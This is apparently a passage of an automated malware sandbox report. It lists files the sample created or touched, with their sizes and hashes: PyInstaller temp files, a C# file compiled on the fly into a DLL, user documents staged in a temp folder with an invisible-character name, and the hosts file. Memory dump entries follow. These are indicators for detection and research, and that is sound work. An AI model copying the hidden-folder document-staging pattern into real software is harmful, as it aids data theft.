b2ee469ea5a6f49bbdd553363baa8ebad2baf13a658d0d0c167fde7b82eb77a417d519420db64f325d0224f133e3c5267df3aa56c11891d740d6742adf84dbe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41642\unicodedata.pyd

Filesize
293KB

MD5
bb3fca6f17c9510b6fb42101fe802e3c

SHA1
cb576f3dbb95dc5420d740fd6d7109ef2da8a99d

SHA256
5e2f1bbfe3743a81b00717011094798929a764f64037bedb7ea3d2ed6548eb87

SHA512
05171c867a5d373d4f6420136b6ac29fa846a85b30085f9d7fabcbb4d902afee00716dd52010ed90e97c18e6cb4e915f13f31a15b2d8507e3a6cfa80e513b6a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ox0kcpul.scs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nc0ghulq\nc0ghulq.dll

Filesize
4KB

MD5
78fdaf34a6f796e7f16a902d0c664c8f

SHA1
1c79dc82d269268796c70d3dbfca3dd029b08624

SHA256
3cb72b34281d967cb176d7db2d9279b9a6994a96ff908b4c61f61bf6bf1f5f4f

SHA512
7a7b224d94429ac571d46437a2bdc50cdb01296b829a917cc2414dfd8fb40ec223eeb8fb9f246eb3b9fc1d85a625232acd9f85e2d2db919d018699022e66665d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\CheckpointDebug.docx

Filesize
18KB

MD5
af54edc27c578b9f87f7d51e3bc762e4

SHA1
8c8ff2863c50336076339c7935267a7ff84a9f21

SHA256
8e291eaa2082c5f922c145deab0de86fb98bad3ec1c2796f3f7df5dcbf9f1ffd

SHA512
1fe591730bb0b63c6b4638af58313917949ad87f13cc262c9a00b9e03489cc57f37b5478912d0fe6cdd00e3c8da434a443c754e0596c403103faa6a1acc08113

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\ConvertToSearch.docx

Filesize
19KB

MD5
59c2275d22cb6448908f0813ed53c970

SHA1
2735a6578795262a44464f7ac9fbb15482fa119c

SHA256
4c7500e7b3aebf79b005d731587626a73e3196c4da407fa56f64fe3ab182a4eb

SHA512
afba09501fc8d9b7679390cefabf90cb09cdf6eb0714372144c9f0327680268d335360e049731c0974d227abc5ee4b43ee9a4dcf9ebd6c583dd6fa2d911f3360

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\RequestFind.xlsx

Filesize
10KB

MD5
e3e37d1479142efac15df0c55c3129f6

SHA1
098831ee410a19e7ce851ddc182ec41186bf38be

SHA256
81fe46350977e2586199f47868ebfcb5edb2efb8f0f41c75fe03e74f499562f7

SHA512
bc45d81aefa4cf6e75899694a29033f73c5f67e87ce150cf0986f2963405aa3662b514f80d299a096112a431daee230f2f2df130e05fa70ef399a43ce1dd883a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\RestoreStop.docx

Filesize
14KB

MD5
5ca68d35ee1a9d02d59658e9908749ea

SHA1
2217add01cace16c1fbba6073e7720b69d703a28

SHA256
c46a09802356b88ff44a1afd85da6eea62adafa40677a0bf6f355d382098464f

SHA512
b8a57127c96f0d3c866bd1e69672bcb13c968bdeb804971316c4f88931bfbee9005ffb651e44ca46c83dcc91302b35c47f37f8ae68a3e4f005a194c266555496

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\SplitSelect.docx

Filesize
20KB

MD5
00876cd2ed26c20cdc83740035e660fa

SHA1
9e7a630c50701b25e4bafc39ad052c3c157235ab

SHA256
ea6069d7e51e2db297259a73141473ac86cfb35fdfc3749cad744bbf4d4ea586

SHA512
865650a50f6618a1bceed768a7fdddf2d41ef922e0cd210a1f5dae934dd7b62a7bc3c391fa47cfce4e2df41ac19953ceca0fbbe16891411266aca0c793e81d7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Desktop\TraceJoin.xlsx

Filesize
11KB

MD5
aa72ee21f0950ca3697d330100e40441

SHA1
e878ff40ffc7bf59678185746a494c69c4903de3

SHA256
d8c3e4f5e330e2b6198fb95788dbe5b37e2d14bbf111fd9b1cd897406c810b5c

SHA512
8479e40361ab05a04df781f8967dd5b5faa7701d30c92783bf7127c873cfa513e7dc99505496708b61acf150c319ff83a5d9e41aa259fa6d289c6b947eb17127

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\ClearInstall.docx

Filesize
18KB

MD5
e9c8ec8d337dfee2c217a497f9eb1c7e

SHA1
7ec622263ed05c4c0cf179815711597720ad371d

SHA256
271d89d3c7b590141e2821ec76ed84b9b062a4c4a44da90158e63a7416c01ed5

SHA512
e26b02ae441a84f26549033a975fdef54e265cef64e95abc08723f7dc079e895b86471ff89b07ba493e058b0c627e7822ceb89606c1afd2d71aa0d362deb29ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\DebugFormat.docx

Filesize
13KB

MD5
b52f0b670e4bc56fb65b3ebfb06fbd05

SHA1
05968c3844e68543a3f2b2706cb045b58a75783b

SHA256
fe20f4919d52d7c0ad3524b5bf5656ee859098aea3dc71860ff89a01555f433d

SHA512
0a6f1cc7c3b1f8044ead30ac9aa1c7ef54cccaea03febe4dc0cc24adf929b0d3fe45360f54e2b00d25b0e931e3bb34818b1b7499e944e77f8cf0dad3069fbbf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\JoinConvert.docx

Filesize
18KB

MD5
40b0d30c865040a5597910b466bfecd5

SHA1
6200543daf4ea1254e0e3b4c406d99eb44798a55

SHA256
34e4ae9228af21797d9dfa5e9a67361db62aeb1410e92f0669f86679da874483

SHA512
51d03f9dcad63ed50eb065910875531753fbf8a1c74c4bfe46d2c3f2487f93c3607942de35a86d32ab65fefac0c7fe9050d3318ae08873c34a55021aaca99dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\MoveConvert.doc

Filesize
1.1MB

MD5
80b4521a22b6baf44843de733c63831b

SHA1
0e646617d93a27b6192ce1a13425ea49a4ec0dfd

SHA256
84be401834e537105559e1188812512a6ca725d2719fe230743ddcfad07a4271

SHA512
c028269fa7ce6e3e2160ca9ccc91de571965a5c5135c5496390c7d98f30bf48a81de1578f9976b610e3c8774e4378cbb40cee8cf51e955c0cc0145f020f5b3a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\ResumeComplete.xlsx

Filesize
606KB

MD5
eb155e15145bc8a7592ece9f4b7ac971

SHA1
cee1c6b750f7b079a772c7d8969671da1a5d87f2

SHA256
5a91b260e3c8cd13c4ccfb838cdc93b3d4cecb5b107e988527c56d6b947baab8

SHA512
f86f74f6bfdab8b5c3e53e773b2c3e52e7bad2d0b25f5bb4c663d9251afee4b42384379e539aaaa0bba83d943093bebc9d918b8f1cbfa51ace9dc5e905e6e602

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏  \Common Files\Documents\SkipConvertTo.xls

Filesize
999KB

MD5
5fec35cf8e4db6a7e00be746d949b061

SHA1
68a7eb842aee51fd43e0bfb16cd0637de1f3366b

SHA256
e86a9561254d5ffe5841e933b66fbba8029983bb79fda889ae2ae4baec77ebf4

SHA512
cb457862de8739f3c64bebe485e50eaa3fc6a58259d724cc6032b40e5b6c970c631a2b89b6fbc7b1065e645dd9c80d8acdd3971f121cb9f78cd9b0f69a4d5082

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nc0ghulq\CSCBDE2C53691B14C5794EAE129F9D1349C.TMP

Filesize
652B

MD5
9ed891b05b023c78a5a2250d993c9a63

SHA1
8ae13c80a02a12a1e132fa96d5464931377f9b91

SHA256
dbc9ff356ecaddfa197281f481d049e0ae8b0712757ebaa6f77a0b78f7a6d37d

SHA512
b999f705ffc3d82cc3606f498d584820322b3c757113c3747fd317efa0740b9c1b5513be710ce46f21eab38157b1ab04ba2e5482055838bbd725a00a91bc2b53

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nc0ghulq\nc0ghulq.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nc0ghulq\nc0ghulq.cmdline

Filesize
607B

MD5
f31a68baeec93d497d48bdd0fb6665dc

SHA1
75170f0c407340cfb643f18320339da5aa4b50d5

SHA256
8c4dfed9da47e997d9b6b6d91a656630ebb45625450b16f00e27ad45f8711caf

SHA512
28ba898e4e1efff732cb89bea471ac7085227dc3ceba6d0879cef009dab5239e2c9fb9010494d8ba869fc4b9f2e5239dd3a0f51464b7f4ec6072cbdf089725c6

Download Submit
memory/3088-83-0x000001D9EF9D0000-0x000001D9EF9F2000-memory.dmp

Filesize
136KB

Download
memory/3620-31-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp

Filesize
144KB

Download
memory/3620-58-0x00007FFCAE600000-0x00007FFCAE623000-memory.dmp

Filesize
140KB

Download
memory/3620-111-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp

Filesize
1.4MB

Download
memory/3620-108-0x00007FFCAE600000-0x00007FFCAE623000-memory.dmp

Filesize
140KB

Download
memory/3620-81-0x00007FFCB42A0000-0x00007FFCB42B9000-memory.dmp

Filesize
100KB

Download
memory/3620-82-0x00007FFC9DCA0000-0x00007FFC9DDBC000-memory.dmp

Filesize
1.1MB

Download
memory/3620-78-0x00007FFCAE630000-0x00007FFCAE65D000-memory.dmp

Filesize
180KB

Download
memory/3620-79-0x00007FFCAE710000-0x00007FFCAE71D000-memory.dmp

Filesize
52KB

Download
memory/3620-351-0x00007FFC9DDC0000-0x00007FFC9E135000-memory.dmp

Filesize
3.5MB

Download
memory/3620-76-0x00007FFCAE4D0000-0x00007FFCAE4E4000-memory.dmp

Filesize
80KB

Download
memory/3620-214-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp

Filesize
52KB

Download
memory/3620-73-0x00000245DAA40000-0x00000245DADB5000-memory.dmp

Filesize
3.5MB

Download
memory/3620-74-0x00007FFC9DDC0000-0x00007FFC9E135000-memory.dmp

Filesize
3.5MB

Download
memory/3620-266-0x00007FFCAE4F0000-0x00007FFCAE51E000-memory.dmp

Filesize
184KB

Download
memory/3620-268-0x00007FFCA63A0000-0x00007FFCA6458000-memory.dmp

Filesize
736KB

Download
memory/3620-269-0x00000245DAA40000-0x00000245DADB5000-memory.dmp

Filesize
3.5MB

Download
memory/3620-71-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp

Filesize
144KB

Download
memory/3620-72-0x00007FFCA63A0000-0x00007FFCA6458000-memory.dmp

Filesize
736KB

Download
memory/3620-70-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp

Filesize
5.9MB

Download
memory/3620-66-0x00007FFCAE4F0000-0x00007FFCAE51E000-memory.dmp

Filesize
184KB

Download
memory/3620-64-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp

Filesize
52KB

Download
memory/3620-62-0x00007FFCAE520000-0x00007FFCAE539000-memory.dmp

Filesize
100KB

Download
memory/3620-60-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp

Filesize
1.4MB

Download
memory/3620-170-0x00007FFCAE520000-0x00007FFCAE539000-memory.dmp

Filesize
100KB

Download
memory/3620-56-0x00007FFCB42A0000-0x00007FFCB42B9000-memory.dmp

Filesize
100KB

Download
memory/3620-54-0x00007FFCAE630000-0x00007FFCAE65D000-memory.dmp

Filesize
180KB

Download
memory/3620-48-0x00007FFCB6C30000-0x00007FFCB6C3F000-memory.dmp

Filesize
60KB

Download
memory/3620-25-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp

Filesize
5.9MB

Download
memory/3620-284-0x00007FFC9DDC0000-0x00007FFC9E135000-memory.dmp

Filesize
3.5MB

Download
memory/3620-297-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp

Filesize
144KB

Download
memory/3620-296-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp

Filesize
5.9MB

Download
memory/3620-302-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp

Filesize
1.4MB

Download
memory/3620-321-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp

Filesize
5.9MB

Download
memory/3620-336-0x00007FFC9E9E0000-0x00007FFC9EFC8000-memory.dmp

Filesize
5.9MB

Download
memory/3620-356-0x00007FFCAE600000-0x00007FFCAE623000-memory.dmp

Filesize
140KB

Download
memory/3620-364-0x00007FFC9DCA0000-0x00007FFC9DDBC000-memory.dmp

Filesize
1.1MB

Download
memory/3620-363-0x00007FFCAE710000-0x00007FFCAE71D000-memory.dmp

Filesize
52KB

Download
memory/3620-362-0x00007FFCAE4D0000-0x00007FFCAE4E4000-memory.dmp

Filesize
80KB

Download
memory/3620-361-0x00007FFCA63A0000-0x00007FFCA6458000-memory.dmp

Filesize
736KB

Download
memory/3620-360-0x00007FFCAE4F0000-0x00007FFCAE51E000-memory.dmp

Filesize
184KB

Download
memory/3620-359-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp

Filesize
52KB

Download
memory/3620-358-0x00007FFCAE520000-0x00007FFCAE539000-memory.dmp

Filesize
100KB

Download
memory/3620-357-0x00007FFC9E860000-0x00007FFC9E9D3000-memory.dmp

Filesize
1.4MB

Download
memory/3620-355-0x00007FFCB42A0000-0x00007FFCB42B9000-memory.dmp

Filesize
100KB

Download
memory/3620-354-0x00007FFCAE630000-0x00007FFCAE65D000-memory.dmp

Filesize
180KB

Download
memory/3620-353-0x00007FFCB1C90000-0x00007FFCB1CB4000-memory.dmp

Filesize
144KB

Download
memory/3620-352-0x00007FFCB6C30000-0x00007FFCB6C3F000-memory.dmp

Filesize
60KB

Download
memory/4632-210-0x0000025B70840000-0x0000025B70848000-memory.dmp

Filesize
32KB

Download